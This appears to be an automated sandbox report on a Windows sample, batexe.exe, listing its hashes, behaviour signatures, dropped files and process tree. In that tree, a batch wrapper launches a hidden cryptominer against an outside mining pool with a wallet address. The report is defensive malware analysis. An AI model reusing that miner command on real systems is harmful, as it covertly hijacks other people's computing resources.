Analysis

  • max time kernel
    292s
  • max time network
    305s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    14-02-2024 16:32

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3752
    • C:\Users\Admin\AppData\Local\Temp\9172.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\9172.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9172.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\975E.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:468

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9172.tmp\b2e.exe

    Filesize

    7.8MB

    MD5

    61372b339a2819a6b5f6eaf59168ea70

    SHA1

    dc21c10ee8c401a017a84ea516015043ad5c7020

    SHA256

    0ed93d677f96cde8eeb970d8ed3ac169976dd7b5aa03052d9a6d99edf22eaec7

    SHA512

    7f461026d6a289ac1cf76c78d0ec6b9d861448b9918270f05f20929a9cc50a6a69a052e651d24a95266e12d0940765e3993a2a28aa61f08f72e7cea84ba73040

  • C:\Users\Admin\AppData\Local\Temp\9172.tmp\b2e.exe

    Filesize

    832KB

    MD5

    e1bd95ac3f9c6ce43914de2a53967fee

    SHA1

    3e03982c075df051d5a8dd837f42873f30483faf

    SHA256

    45c3475b58fbaa942be0297167c5c3fbbfe7295aa3fcbb4fb61df1348f55c550

    SHA512

    2166424e86301bbe04fbcce5d0b91562248845c5b1a7e889fee9a95d1c872dd6ea5cc85792b54e6d085095339be2f2b7f30cfd9b40a071b51c96a5009cc96f00

  • C:\Users\Admin\AppData\Local\Temp\9172.tmp\b2e.exe

    Filesize

    1.2MB

    MD5

    7b0f4c1d8506067fce25df5de733bcb7

    SHA1

    053b618c2012c6895e9709696395951acf15c165

    SHA256

    dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

    SHA512

    45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

  • C:\Users\Admin\AppData\Local\Temp\975E.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.3MB

    MD5

    4c04147c386ba8792ac6a03069572a8a

    SHA1

    dda67789fc1d0f2469ca95f01a5c81034853ca6a

    SHA256

    c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

    SHA512

    a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.1MB

    MD5

    1d224a4c57a729ccdbd4f9d13656ca0b

    SHA1

    bb8939539de49ee41d4a11caf9ec81b9ea1cea1c

    SHA256

    dde910e3ba7aad77b66e776c724f11cc17956df4c1f64f901566c7a4c2a70532

    SHA512

    034af5693d5d4f322cd722f2ee3afc1e9036f8f6ef1339eaaf81d1f6faebcf3afbe7ef4265678c7e361772928c2d730ad4c10434a167356455b2fb4b2327f4e7

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    2.8MB

    MD5

    c89eccb172245572e12e1ef31352c451

    SHA1

    96b44d49114268c567b7a9682327d27a0f0aa80d

    SHA256

    7891f06b27f93b1ee548c045eaa07511bc74c292cc4c6d5275dc66523730bf33

    SHA512

    19fee3424df1abc582f55c4785e5175bb0bd1375e235aefedbfbe30be07d2642937b09abec4f06802c28e248e1052b58453695baf29d26efa3e0a81848e8e0c1

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    2.3MB

    MD5

    04ea0e79eec36f824ea467a956fd28e8

    SHA1

    86434e12c7f7d29d95940f24f63a0387d1658afe

    SHA256

    4840f2546e64eac04624bb12c0c26af397f62e994e8221db8cfeeb18c9810f47

    SHA512

    65a66c2788ed8967b21dd4187246acff04ff5b5929d6d3f0c3ada8aff9a3e77fbd24aab0e1816a9a338ce829b52dc1c39f2732882ae32ef32c7d19c4e2f28db3

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    2.1MB

    MD5

    2b21d98b470eaa1e9333f52f13eee54b

    SHA1

    7859607d8004999748e748771111d79b0f49cc33

    SHA256

    09103a0b454836dd86f6f9654e87228b016c301133c3a6f3cbf1d99c7068b522

    SHA512

    283371f7a5f2b1740764f8ec09f5858ec89d88dd7fcb3d8e7b17a2cdf4c3c6763ef92e588af643a7e4db0c83006c541562fd114858274ffd2e70ae23fa13b44f

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/468-45-0x0000000065820000-0x00000000658B8000-memory.dmp

    Filesize

    608KB

  • memory/468-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/468-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-46-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/468-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/468-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-53-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/468-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3024-58-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3024-9-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3752-7-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB